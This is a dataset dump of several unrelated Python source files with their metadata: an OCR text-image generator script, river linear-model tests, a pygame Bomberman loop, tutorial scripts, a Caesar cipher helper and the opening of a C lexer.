for the generation. Set '-let','-num','-sym' to use letters/numbers/symbols. If none specified, using all three.\",\n default=False\n )\n parser.add_argument(\n \"-let\",\n \"--include_letters\",\n action=\"store_true\",\n help=\"Define if random sequences should contain letters. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-num\",\n \"--include_numbers\",\n action=\"store_true\",\n help=\"Define if random sequences should contain numbers. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-sym\",\n \"--include_symbols\",\n action=\"store_true\",\n help=\"Define if random sequences should contain symbols. Only works with -rs\",\n default=False\n )\n parser.add_argument(\n \"-w\",\n \"--length\",\n type=int,\n nargs=\"?\",\n help=\"Define how many words should be included in each generated sample. If the text source is Wikipedia, this is the MINIMUM length\",\n default=5\n )\n parser.add_argument(\n \"-r\",\n \"--random\",\n action=\"store_true\",\n help=\"Define if the produced string will have variable word count (with --length being the maximum)\",\n default=False\n )\n parser.add_argument(\n \"-f\",\n \"--format\",\n type=int,\n nargs=\"?\",\n help=\"Define the height of the produced images if horizontal, else the width\",\n default=65,\n )\n parser.add_argument(\n \"-t\",\n \"--thread_count\",\n type=int,\n nargs=\"?\",\n help=\"Define the number of thread to use for image generation\",\n default=1,\n )\n parser.add_argument(\n \"-e\",\n \"--extension\",\n type=str,\n nargs=\"?\",\n help=\"Define the extension to save the image with\",\n default=\"png\",\n )\n parser.add_argument(\n \"-k\",\n \"--skew_angle\",\n type=int,\n nargs=\"?\",\n help=\"Define skewing angle of the generated text. In positive degrees\",\n default=0,\n )\n parser.add_argument(\n \"-rk\",\n \"--random_skew\",\n action=\"store_true\",\n help=\"When set, the skew angle will be randomized between the value set with -k and it's opposite\",\n default=False,\n )\n parser.add_argument(\n \"-wk\",\n \"--use_wikipedia\",\n action=\"store_true\",\n help=\"Use Wikipedia as the source text for the generation, using this paremeter ignores -r, -n, -s\",\n default=False,\n )\n parser.add_argument(\n \"-bl\",\n \"--blur\",\n type=int,\n nargs=\"?\",\n help=\"Apply gaussian blur to the resulting sample. Should be an integer defining the blur radius\",\n default=0,\n )\n parser.add_argument(\n \"-rbl\",\n \"--random_blur\",\n action=\"store_true\",\n help=\"When set, the blur radius will be randomized between 0 and -bl.\",\n default=False,\n )\n parser.add_argument(\n \"-b\",\n \"--background\",\n type=int,\n nargs=\"?\",\n help=\"Define what kind of background to use. 0: Gaussian Noise, 1: Plain white, 2: Quasicrystal, 3: Pictures\",\n default=1,\n )\n parser.add_argument(\n \"-hw\",\n \"--handwritten\",\n action=\"store_true\",\n help=\"Define if the data will be \\\"handwritten\\\" by an RNN\",\n )\n parser.add_argument(\n \"-na\",\n \"--name_format\",\n type=int,\n help=\"Define how the produced files will be named. 0: [TEXT]_[ID].[EXT], 1: [ID]_[TEXT].[EXT] 2: [ID].[EXT] + one file labels.txt containing id-to-label mappings\",\n default=2,\n #file labels.txt will then be parse by file_parser.py to get all the .gt.txt. files \n )\n parser.add_argument(\n \"-d\",\n \"--distorsion\",\n type=int,\n nargs=\"?\",\n help=\"Define a distorsion applied to the resulting image. 0: None (Default), 1: Sine wave, 2: Cosine wave, 3: Random\",\n default=0\n )\n parser.add_argument(\n \"-do\",\n \"--distorsion_orientation\",\n type=int,\n nargs=\"?\",\n help=\"Define the distorsion's orientation. Only used if -d is specified. 0: Vertical (Up and down), 1: Horizontal (Left and Right), 2: Both\",\n default=0\n )\n parser.add_argument(\n \"-wd\",\n \"--width\",\n type=int,\n nargs=\"?\",\n help=\"Define the width of the resulting image. If not set it will be the width of the text + 10. If the width of the generated text is bigger that number will be used\",\n default=-1\n )\n parser.add_argument(\n \"-al\",\n \"--alignment\",\n type=int,\n nargs=\"?\",\n help=\"Define the alignment of the text in the image. Only used if the width parameter is set. 0: left, 1: center, 2: right\",\n default=1\n )\n parser.add_argument(\n \"-or\",\n \"--orientation\",\n type=int,\n nargs=\"?\",\n help=\"Define the orientation of the text. 0: Horizontal, 1: Vertical\",\n default=0\n )\n parser.add_argument(\n \"-tc\",\n \"--text_color\",\n type=str,\n nargs=\"?\",\n help=\"Define the text's color, should be either a single hex color or a range in the ?,? format.\",\n #default='#282828'\n default='#000000'\n )\n parser.add_argument(\n \"-sw\",\n \"--space_width\",\n type=float,\n nargs=\"?\",\n help=\"Define the width of the spaces between words. 2.0 means twice the normal space width\",\n default=0.5\n )\n parser.add_argument(\n \"-m\",\n \"--margins\",\n type=margins,\n nargs=\"?\",\n help=\"Define the margins around the text when rendered. In pixels\",\n default=(3,5,3,5) #upper, left, lower, right\n )\n parser.add_argument(\n \"-fi\",\n \"--fit\",\n action=\"store_true\",\n help=\"Apply a tight crop around the rendered text\",\n default=False\n )\n parser.add_argument(\n \"-sf\",\n \"--show_font\",\n action='store_true',\n help=\"Show the current font and its available characters before generation of files\",\n default=False\n )\n parser.add_argument(\n \"-ro\",\n \"--rename_output\",\n action=\"store_true\",\n help=\"Rename the output, to give a unique filename to the resulting images\",\n default=False\n )\n parser.add_argument(\n \"-rm\",\n \"--remove_old\",\n action=\"store_true\",\n help=\"Delete old files that may exist from previous runs\",\n default=False\n )\n parser.add_argument(\n \"-z\",\n \"--zip_output\",\n action=\"store_true\",\n help=\"Creates a zipFile with the created png- and gt-Files for easier upload on the server\",\n default=False \n )\n# =============================================================================\n# #TODO, not implemented yet \n# parser.add_argument(\n# \"-cs\",\n# \"--character_spacing\",\n# type=float,\n# nargs=\"?\",\n# help=\"Define the spacing between the characters of a word\",\n# default=1.0 \n# )\n# =============================================================================\n\n return parser.parse_args()\n\ndef load_dict(lang):\n \"\"\"\n Read the dictionnary file and returns all words in it.\n \"\"\"\n\n lang_dict = []\n with open(os.path.join('dicts', lang + '.txt'), 'r', encoding=\"utf8\", errors='ignore') as d:\n lang_dict = d.readlines()\n return lang_dict\n\ndef load_fonts(lang):\n \"\"\"\n Load all fonts in the fonts directories\n \"\"\"\n\n if lang == 'cn':\n return [os.path.join('fonts/cn', font) for font in os.listdir('fonts/cn')]\n elif lang=='hist':\n return [os.path.join('fonts/historic', font) for font in os.listdir('fonts/historic')]\n else:\n return [os.path.join('fonts/latin', font) for font in os.listdir('fonts/latin')]\n\n\n#this might not look as nice for other fonts with a different number of glyphs\ndef plot_font(): \n path = os.path.join('fonts','historic', '1557-true_character_occurence.ttf')\n ttf = TTFont(path, 0, allowVID=0,ignoreDecompileErrors=True,fontNumber=-1)\n prop = mfm.FontProperties(fname=path)\n \n all_chars = [] \n for x in ttf[\"cmap\"].tables:\n for char in x.cmap.items():\n true_char = chr(char[0])\n all_chars.append(true_char) #all_chars now contains all the characters, format: (unicode, 'char'), e.g. (77, 'M')\n \n final_list = list(dict.fromkeys(all_chars)) #remove duplicate keys \n final_list[:] = [s for s in final_list if (s.isalpha() or (s in string.punctuation))] #remove \\t,\\n,\\r, etc\n final_list = final_list[:len(final_list)-1]\n no_of_suplots = math.ceil(math.sqrt(len(final_list)))\n \n \n fig, axs = plt.subplots(no_of_suplots,no_of_suplots, figsize=(8, 8), facecolor='w', edgecolor='k')\n fig.subplots_adjust(hspace = .5, wspace=.001)\n\n axs = axs.ravel()\n\n for ax in axs: ax.axis('off')\n for i in range(len(final_list)-2): #-1 to exclude weird Ê and Ï symbol at the end \n axs[i].text(0.5,0,s=final_list[i],fontproperties=prop,fontsize=20)\n axs[i].set_title(\" \" + final_list[i])\n \n fig.tight_layout()\n \n textstr = 'not available: j, k, w, z --- F, J, K, U, V, W, X, Y, Z' \n plt.text(0.2,0.07, textstr, fontsize=14, transform=plt.gcf().transFigure)\n \n plt.show() \n ttf.close()\n\n\ndef main():\n \"\"\"\n Description: Main function\n \"\"\"\n\n\n\n # Argument parsing\n args = parse_arguments()\n args.count += 1 \n \n # Create font (path) list\n fonts = load_fonts(args.language)\n\n if args.show_font==True: \n print('The following font will be used:',fonts[0],'\\n')\n char = input('proceed? y(yes), n(no), s(show font)')\n if char=='s' or char=='show font': \n plot_font()\n char2 = input('proceed? y(yes), n(no)')\n if char2 != 'y': return\n elif char!='y': \n return \n\n # Create the directory if it does not exist.\n try:\n os.makedirs(args.output_dir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n # Creating word list\n lang_dict = load_dict(args.language)\n\n curr_dir = os.getcwd()\n os.chdir(args.output_dir) \n\n if args.remove_old: \n answer = input(\"\\n\\n-------------------------\\n\\nWarning. This will delete all png-,zip- and gt.txt files that currently reside in {}. Proceed? (y/n) \".format(os.getcwd()))\n if answer == 'y': \n for file in os.listdir(os.getcwd()):\n if file.endswith('.png') or file.endswith('.gt.txt') or file.endswith('.zip'): \n os.remove(file)\n else: return \n\n os.chdir(curr_dir)\n # Creating synthetic sentences (or word)\n strings = []\n\n if args.use_wikipedia:\n strings = create_strings_from_wikipedia(args.length, args.count, args.language)\n elif args.input_file != '':\n strings = create_strings_from_file(args.input_file, args.count)\n elif args.random_sequences:\n strings = create_strings_randomly(args.length, args.random, args.count,\n args.include_letters, args.include_numbers, args.include_symbols, args.language)\n # Set a name format compatible with special characters automatically if they are used\n if args.include_symbols or True not in (args.include_letters, args.include_numbers, args.include_symbols):\n args.name_format = 2\n else:\n strings = create_strings_from_dict(args.length, args.random, args.count, lang_dict)\n\n\n string_count = len(strings)\n\n p = Pool(args.thread_count)\n for _ in tqdm(p.imap_unordered(\n FakeTextDataGenerator.generate_from_tuple,\n zip(\n [i for i in range(0, string_count)],\n strings,\n [fonts[random.randrange(0, len(fonts))] for _ in range(0, string_count)],\n [args.output_dir] * string_count,\n [args.format] * string_count,\n [args.extension] * string_count,\n [args.skew_angle] * string_count,\n [args.random_skew] * string_count,\n [args.blur] * string_count,\n [args.random_blur] * string_count,\n [args.background] * string_count,\n [args.distorsion] * string_count,\n [args.distorsion_orientation] * string_count,\n [args.handwritten] * string_count,\n [args.name_format] * string_count,\n [args.width] * string_count,\n [args.alignment] * string_count,\n [args.text_color] * string_count,\n [args.orientation] * string_count,\n [args.space_width] * string_count,\n [args.margins] * string_count,\n [args.fit] * string_count\n )\n ), total=args.count):\n pass\n p.terminate()\n\n\n\n if args.name_format == 2:\n # Create file with filename-to-label connections\n with open(os.path.join(args.output_dir, \"labels.txt\"), 'w', encoding=\"utf8\") as f:\n for i in range(string_count):\n file_name = str(i) + \".\" + args.extension\n f.write(\"{} {}\\n\".format(file_name, strings[i]))\n \n #create txt-files for nn groundtruth\n file_parser.parse_labels(args.extension)\n \n #delete 0th file bc it has strange start character that is not displayed in notepad but causes weird glyph in image\n os.chdir(args.output_dir)\n os.remove('0.png')\n os.remove('0.gt.txt')\n os.remove('labels.txt')\n \n \n \n # ------------------ rename all imgs ------------------\n \n if args.rename_output: \n for file in os.listdir(os.getcwd()):\n \n if file.endswith('.png'): \n file_name = file.split('.')[0]\n if(len(file_name)) > 10: continue #important, bc otherwise it will double-find the newly created unique_name.pngs\n txt_file = file_name + '.gt.txt'\n \n unique = str(uuid.uuid4().hex)\n unique_name_png = unique + '.png'\n unique_name_txt = unique + '.gt.txt'\n \n os.rename(file, unique_name_png)\n os.rename(txt_file, unique_name_txt)\n \n \n \n # ------------------ zip images ------------------\n \n if args.zip_output: \n \n import zipfile \n \n zip_name = str(uuid.uuid4().hex)+'.zip'\n zip_handler = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n \n for file in os.listdir(os.getcwd()): \n if not file.endswith('.zip'):\n zip_handler.write(file)\n \n zip_handler.close()\n print(\"\\nCreated Zip-Archive in {}.\".format(os.getcwd()))\n \n \n \n \n \n \n \n \n\nif __name__ == '__main__':\n main()\n","sub_path":"TextRecognitionDataGenerator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":16726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444826507","text":"#!/usr/bin/python3\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import NullFormatter\n\nfig, ax = plt.subplots(1, 2)\nprint(ax, type(ax), len(ax))\n\n# Number of Steps\nx = [16.43167673, 27.03701167, 76.15773106,]\n\nax[0].set(title=\"Avg n(Steps)\", xlabel=\"sqrt(n_squares)\", ylabel=\"Avg Steps\")\ny1 = [40, 3235, 650]\nax[0].plot(x, y1, label=\"Utility Based\", color=\"blue\", marker='o')\ny1 = [537.64, 3590, 1311]\n\nax[0].set_ylim(bottom=0)\nax[0].legend()\n\n\n# PEAK MEMORY\nax[1].set(title=\"Peak Memory\", xlabel=\"sqrt(n_squares)\", ylabel=\"MB\")\nax[1].set_ylim(bottom=60)\nax[1].set_ylim(top=70)\n\ny1 = [68.056, 66.45, 66.46]\nax[1].plot(x, y1, label=\"Utility Based\", color=\"blue\", marker='o')\nax[1].legend()\n\n\n\n\nfig.suptitle(\"Utility Based Agent\\nLength/history of body not considered\")\nplt.show()\n","sub_path":"knowledgerep/Assignment1/plots/plot_utility.py","file_name":"plot_utility.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"464642989","text":"def sol(A):\n dic = dict()\n for i in A:\n if bool(dic.get(i)) is False:\n dic[i] = 1\n else:\n dic.pop(i)\n for key in dic.keys():\n print(key)\n\nsol([9,3,9,3,9,7,9])","sub_path":"codility/OddOccurrencesInArray.py","file_name":"OddOccurrencesInArray.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213065957","text":"import copy\nimport itertools\nimport math\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model as sklm\nimport pytest\n\nfrom river import datasets\nfrom river import linear_model as lm\nfrom river import optim\nfrom river import preprocessing\nfrom river import stream\nfrom river import utils\n\n\ndef iter_perturbations(keys, n=10):\n \"\"\"Enumerate perturbations that will be applied to the weights.\"\"\"\n\n # Enumerate unit vectors\n for i in keys:\n yield {j: int(i == j) for j in keys}\n\n # Enumerate samples from a spherical Gaussian\n for _ in range(n):\n p = {j: random.gauss(0, 1) for j in keys}\n norm = utils.math.norm(p, order=2)\n for j in p:\n p[j] /= norm\n yield p\n\n\n@pytest.mark.parametrize(\n 'lm, dataset',\n [\n pytest.param(\n lm(optimizer=copy.deepcopy(optimizer), initializer=initializer, l2=0),\n dataset,\n id=f'{lm.__name__} - {optimizer} - {initializer}'\n )\n for lm, dataset in [\n (lm.LinearRegression, datasets.TrumpApproval()),\n (lm.LogisticRegression, datasets.Bananas())\n ]\n for optimizer, initializer in itertools.product(\n [\n optim.AdaBound(),\n optim.AdaDelta(),\n optim.AdaGrad(),\n optim.AdaMax(),\n optim.Adam(),\n optim.AMSGrad(),\n # TODO: check momentum optimizers\n # optim.Momentum(),\n # optim.NesterovMomentum(),\n optim.RMSProp(),\n optim.SGD()\n ],\n [\n optim.initializers.Zeros(),\n optim.initializers.Normal(mu=0, sigma=1, seed=42)\n ]\n )\n ]\n)\n@pytest.mark.slow\ndef test_finite_differences(lm, dataset):\n \"\"\"Checks the gradient of a linear model via finite differences.\n\n References\n ----------\n [^1]: [How to test gradient implementations](https://timvieira.github.io/blog/post/2017/04/21/how-to-test-gradient-implementations/)\n [^2]: [Stochastic Gradient Descent Tricks](https://cilvr.cs.nyu.edu/diglib/lsml/bottou-sgd-tricks-2012.pdf)\n\n \"\"\"\n\n scaler = preprocessing.StandardScaler()\n eps = 1e-6\n\n for x, y in dataset:\n\n x = scaler.learn_one(x).transform_one(x)\n\n # Store the current gradient and weights\n gradient, _ = lm._eval_gradient_one(x, y, 1)\n weights = copy.deepcopy(lm._weights)\n\n # d is a set of weight perturbations\n for d in iter_perturbations(weights.keys()):\n\n # Pertubate the weights and obtain the loss with the new weights\n lm._weights = utils.VectorDict({i: weights[i] + eps * di for i, di in d.items()})\n forward = lm.loss(y_true=y, y_pred=lm._raw_dot_one(x))\n lm._weights = utils.VectorDict({i: weights[i] - eps * di for i, di in d.items()})\n backward = lm.loss(y_true=y, y_pred=lm._raw_dot_one(x))\n\n # We expect g and h to be equal\n g = utils.math.dot(d, gradient)\n h = (forward - backward) / (2 * eps)\n\n # Compare signs\n # TODO: reactivate this check\n #assert np.sign(g) == np.sign(h)\n\n # Check absolute difference\n # TODO: decrease the tolerance\n assert abs(g - h) < 1e-5\n\n # Reset the weights to their original values in order not to influence\n # the training loop, even though it doesn't really matter.\n lm._weights = weights\n lm.learn_one(x, y)\n\n\ndef test_one_many_consistent():\n \"\"\"Checks that using learn_one or learn_many produces the same result.\"\"\"\n\n X = pd.read_csv(datasets.TrumpApproval().path)\n Y = X.pop('five_thirty_eight')\n\n one = lm.LinearRegression()\n for x, y in stream.iter_pandas(X, Y):\n one.learn_one(x, y)\n\n many = lm.LinearRegression()\n for xb, yb in zip(np.array_split(X, len(X)), np.array_split(Y, len(Y))):\n many.learn_many(xb, yb)\n\n for i in X:\n assert math.isclose(one.weights[i], many.weights[i])\n\n\ndef test_shuffle_columns():\n \"\"\"Checks that learn_many works identically whether columns are shuffled or not.\"\"\"\n\n X = pd.read_csv(datasets.TrumpApproval().path)\n Y = X.pop('five_thirty_eight')\n\n normal = lm.LinearRegression()\n for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n normal.learn_many(xb, yb)\n\n shuffled = lm.LinearRegression()\n for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n cols = np.random.permutation(X.columns)\n shuffled.learn_many(xb[cols], yb)\n\n for i in X:\n assert math.isclose(normal.weights[i], shuffled.weights[i])\n\n\ndef test_add_remove_columns():\n \"\"\"Checks that no exceptions are raised whenever columns are dropped and/or added.\"\"\"\n\n X = pd.read_csv(datasets.TrumpApproval().path)\n Y = X.pop('five_thirty_eight')\n\n lin_reg = lm.LinearRegression()\n for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n # Pick half of the columns at random\n cols = np.random.choice(X.columns, len(X.columns) // 2, replace=False)\n lin_reg.learn_many(xb[cols], yb)\n\n\ndef test_lin_reg_sklearn_coherence():\n \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n class SquaredLoss:\n \"\"\"sklearn removes the leading 2 from the gradient of the squared loss.\"\"\"\n\n def gradient(self, y_true, y_pred):\n return y_pred - y_true\n\n ss = preprocessing.StandardScaler()\n cr = lm.LinearRegression(optimizer=optim.SGD(.01), loss=SquaredLoss())\n sk = sklm.SGDRegressor(learning_rate='constant', eta0=.01, alpha=.0)\n\n for x, y in datasets.TrumpApproval():\n x = ss.learn_one(x).transform_one(x)\n cr.learn_one(x, y)\n sk.partial_fit([list(x.values())], [y])\n\n for i, w in enumerate(cr.weights.values()):\n assert math.isclose(w, sk.coef_[i])\n\n assert math.isclose(cr.intercept, sk.intercept_[0])\n\n\ndef test_log_reg_sklearn_coherence():\n \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n ss = preprocessing.StandardScaler()\n cr = lm.LogisticRegression(optimizer=optim.SGD(.01))\n sk = sklm.SGDClassifier(learning_rate='constant', eta0=.01, alpha=.0, loss='log')\n\n for x, y in datasets.Bananas():\n x = ss.learn_one(x).transform_one(x)\n cr.learn_one(x, y)\n sk.partial_fit([list(x.values())], [y], classes=[False, True])\n\n for i, w in enumerate(cr.weights.values()):\n assert math.isclose(w, sk.coef_[0][i])\n\n assert math.isclose(cr.intercept, sk.intercept_[0])\n\n\ndef test_perceptron_sklearn_coherence():\n \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n ss = preprocessing.StandardScaler()\n cr = lm.Perceptron()\n sk = sklm.Perceptron()\n\n for x, y in datasets.Bananas():\n x = ss.learn_one(x).transform_one(x)\n cr.learn_one(x, y)\n sk.partial_fit([list(x.values())], [y], classes=[False, True])\n\n for i, w in enumerate(cr.weights.values()):\n assert math.isclose(w, sk.coef_[0][i])\n\n assert math.isclose(cr.intercept, sk.intercept_[0])\n","sub_path":"river/linear_model/test_glm.py","file_name":"test_glm.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238255700","text":"\"\"\"list of dictionaries (dict inside list)\"\"\"\nalien_0 = {'color': 'green', 'points': 5}\nalien_1 = {'color': 'red', 'points': 10}\nalien_2 = {'color': 'yellow', 'points': 15}\naliens = [alien_0, alien_1, alien_2]\nfor alien in aliens:\n print(alien)\nprint(\".............\")\n\n#make an empty list to storing aliens\naliens = []\n#make 30 aliens\nfor alien_number in range(30): #for variable in range():\n new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\n #new_alien= new variable\n aliens.append(new_alien) #varibales.append(new_variable)\n#show the first 5 aliens\nfor alien in aliens[:5]: #need another for loop if want to print\n print(alien)\nprint(\"....\")\n#show how many aliens have been created\nprint(f\"the total number of aliens: {len(aliens)}\")\n#print(f\"{len(variable which is name of list)}\")\nprint(\"......\")\n\"\"\"change color using for loop and if statement\"\"\"\naliens = []\nfor alien_number in range(30):\n new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\n aliens.append(new_alien)\n#change the first 3 aliens\nfor alien in aliens[:3]:\n #if variable_name['key']=='value'\n if alien['color'] == 'green': #remember ==\n #variable_name['key']= 'new_ value'\n alien['color'] = 'yellow' #remember = not == or it wont work\n alien['points'] = 10\n alien['speed'] = 'medium'\n elif alien['color'] == 'yellow': #use elif to turn yellow to red\n alien['color'] = 'red'\n alien['points'] = 15\n alien['speed'] = 'fast'\nfor alien in aliens[:5]:\n print(alien)\nprint(\".......\")\n\"\"\"list in a dictionary\"\"\"\n#store informatuon about a pizza being ordered\npizza = {\n 'crust': 'thick',\n 'toppings': [\n 'mushrooms',\n 'extra cheese',\n ],\n}\n#summarize the order\nprint(f\"you ordered a {pizza['crust']} crust pizza\" #name['key']\n \"with the following toppings:\")\n#break print()= end line with \"\" then indent next line \"___\")\nfor topping in pizza['toppings']:\n #for variable in name['key']:\n print(f\"\\t{topping}\")\nprint(\".......\")\n'''use another for loop inside for loop '''\nfavorite_languages = {\n 'jen': ['python', 'ruby'],\n 'sarah': ['c'],\n 'edward': ['ruby', 'go'],\n 'phill': ['python', 'haskell'],\n}\nfor name, languages in favorite_languages.items():\n if len(languages) >= 2:\n print(f\"\\n{name.title()}'s favorite languages are:\")\n else:\n print(f\"\\n{name.title()}'s favorite language is:\")\n for language in languages:\n #need this because value in list \n #if dont have ankther for loop != loop through the list\n print(f\"\\t{language.title()}\")\n'''dictionary in dictionary'''\nusers={\n 'aeinstein':{ #key_1\n #this chunk is value 1 \n 'first':'albert', #key_2 : value_2\n 'last':'einstein',\n 'location':'princeton',\n },\n 'mcurie':{ #key_1\n #this chunk is value 1\n 'first':'marie', #key_2 : value_2\n 'last':'curie',\n 'location':'paris',\n },\n}\nfor username, user_info in users.items():\n print(f\"\\nUsername: {username}\")\n full_name = f\"{user_info['first']}{user_info['last']}\"\n location = user_info['location']\n print(f\"\\tFull name: {full_name.title()}\")\n print(f\"\\tLocation: {location.title()}\")\n\n","sub_path":"chapter 6/chap 6 nesting .py","file_name":"chap 6 nesting .py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513194344","text":"class Travel_Methods():\n def __init__(self):\n pass\n def convert_to_minutes(time_array):\n minutes_array=[]\n for x in time_array:\n hour = int(str(x).split(\".\")[0])\n minutes = int(float(\"%.2f\" % (x-hour))*100)\n if hour in [0,1,2,3]:\n hour = hour+24\n minutes_array.append(hour*60+minutes)\n return sum(minutes_array)/len(time_array)\n\n def convert_to_hours(minutes_average):\n hour = int(minutes_average/60)\n minute = ((minutes_average / 60 - hour) * 60) / 100\n minute = float(\"%.2f\" % minute)\n\n if hour==24:\n hour =12\n elif hour>24:\n hour=hour-24\n elif hour>12:\n hour=hour-12\n\n hour_minute = float(\"%.2f\" % (hour + minute))\n hour_minute = str(hour_minute).replace(\".\",\":\")\n if len(hour_minute.split(\":\")[1])==1:\n hour_minute = hour_minute+\"0\"\n return hour_minute","sub_path":"travel/management/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"430365636","text":"\n\nfrom xai.brain.wordbase.adjectives._timid import _TIMID\n\n#calss header\nclass _TIMIDEST(_TIMID, ):\n\tdef __init__(self,): \n\t\t_TIMID.__init__(self)\n\t\tself.name = \"TIMIDEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"timid\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_timidest.py","file_name":"_timidest.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"188565496","text":"#!/usr/bin/env python\n\n__author__ = \"Jeanna Clark\"\n__version__ = \"1.0\"\n# May 3, 2017\n# LC-101: Intro to Python Programming\n# Crypto Project [https://runestone.launchcode.org/runestone/static/thinkcspy/ProblemSets/Crypto.html]\n\n# This program implements a caesar & vigenere cipher encryption algorithm\n\n\nimport string\n\n\ndef alphabet_position(letter):\n \"\"\"This function receives a character & returns it's 0-based numerical position\"\"\"\n alphabet = string.ascii_lowercase\n return alphabet.index(letter.lower())\n\n\ndef rotate_character(char, rot):\n \"\"\"This function receives a character and rotation value & returns the rotated character\"\"\"\n if (char in string.punctuation) or char.isspace() or char.isdigit():\n return char\n\n alphabet = string.ascii_lowercase\n encryption_index = alphabet_position(char) + rot\n return alphabet[encryption_index % 26]\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"529451141","text":"import pygame\nfrom world import PygameWorld\n\nFPS = 15\nWIDTH = 512\nHEIGHT = 512\nBLACK = (0, 0, 0)\nGREY = (132, 130, 132)\n\npygame.init()\n\nscreen = pygame.display.set_mode([WIDTH, HEIGHT])\npygame.display.set_caption(\"Bomberman Game\")\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\ndone = False\n\nworld = PygameWorld(screen)\n\n# -------- Main Program Loop -----------\nwhile world.player.is_alive():\n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n done = True # Flag that we are done so we exit this loop\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n world.player.change_direction(world.player.NORTH)\n elif event.key == pygame.K_DOWN:\n world.player.change_direction(world.player.SOUTH)\n elif event.key == pygame.K_RIGHT:\n world.player.change_direction(world.player.RIGHT)\n elif event.key == pygame.K_LEFT:\n world.player.change_direction(world.player.LEFT)\n elif event.key == pygame.K_b:\n world.place_bomb()\n \n # make things happen\n world.run()\n \n # Set the screen background\n screen.fill(GREY)\n \n # draw world\n world.draw()\n \n # Limit to 20 frames per second\n clock.tick(FPS)\n \n # Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n# Be IDLE friendly. If you forget this line, the program will 'hang'\n# on exit.\npygame.quit()","sub_path":"Python_Work/Bomberman1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55352153","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-04-03 21:52\n# @Author : Billy-Nie\n# @FileName: utils.py\n# @E-mail :niechenxiHIT@126.com\n\n\"\"\"\n定义一些在后面的分析中会用到的常数,简单的判断函数什么的\n\"\"\"\n\nfrom DFA_convert import DFA_converter\n\n####################\n# 常量 #\n####################\n#运算符\noperator = ['+', '-', '*', '=', '<', '>', '&', '|', '~', '^', '!', '(', ')', '[', ']', '{', '}', '%', ';', ',', '#']\n#界符\nboundary = [',', ';', '[', ']', '(', ')', '{', '}']\n#关键字\nkeywords = [ \"auto\", \"double\", \"int\", \"struct\", \"break\", \"else\", \"long\", \"switch\", \"case\", \"enum\", \"register\",\n \"typedef\", \"char\", \"extern\", \"return\", \"union\", \"const\", \"float\", \"short\", \"unsigned\", \"continue\", \"for\", \"signed\", \"void\",\n \"default\", \"goto\", \"sizeof\", \"volatile\", \"do\", \"if\", \"while\", \"static\", \"main\", \"String\"]\n\n####################\n# 判断函数 #\n####################\ndef isPlusOp(ch):\n #科学计数法中的e和后面的运算符, 数字应该是一个token\n return ch == \"e\"\n\ndef isAlpha(ch):\n \"\"\"\n 判断该小片段是不是标识符或者关键字\n 标识符或者关键字只能以a~z或者A~Z或者_开头\n \"\"\"\n return ((ch >= 'a' and ch <= 'z') or (ch >= 'A' and ch <= 'Z') or ch == '_' )\n\ndef isOp(ch):\n '''\n 判断该小片段是不是运算符\n '''\n return ch in operator\n\ndef isDigit(ch):\n \"\"\"\n 判断是否是数字\n \"\"\"\n return (ch >= '0' and ch <= '9')\n\ndef isKeywords(str):\n \"\"\"\n 判断输入字符串是不是一个合法的关键字\n \"\"\"\n return str in keywords\n\ndef isPlusEqu(ch):\n \"\"\"\n 运算符之后可以加等于\n \"\"\"\n plusEqu = ['+', '-', '*', '/', '=', '>', '<', '&', '|', '^', '!']\n return ch in plusEqu\n\ndef isPlusSame(ch):\n #运算符后可以连一个一模一样的运算符, 例如++, --\n plusSame = ['+', '-', '&', '|', '=', '<', '>']\n return ch in plusSame\n\ndef isChar(ch):\n return ch == \"'\"\n\ndef isString(ch):\n return ch == '\"'\n\n#####################\n# DFA #\n#####################\n\ndigitDFA_path = \"DFA/DigitDFA\"\ncharDFA_path = \"DFA/charDFA\"\nstringDFA_path = \"DFA/stringDFA\"\ncommentDFA_path = \"DFA/commentDFA\"\nO_H_DFA_path = \"DFA/O_H_DFA\"\n\n\nclass DigitDFA:\n __digitDFA = None\n __final_state = None\n __digitDFA_path = 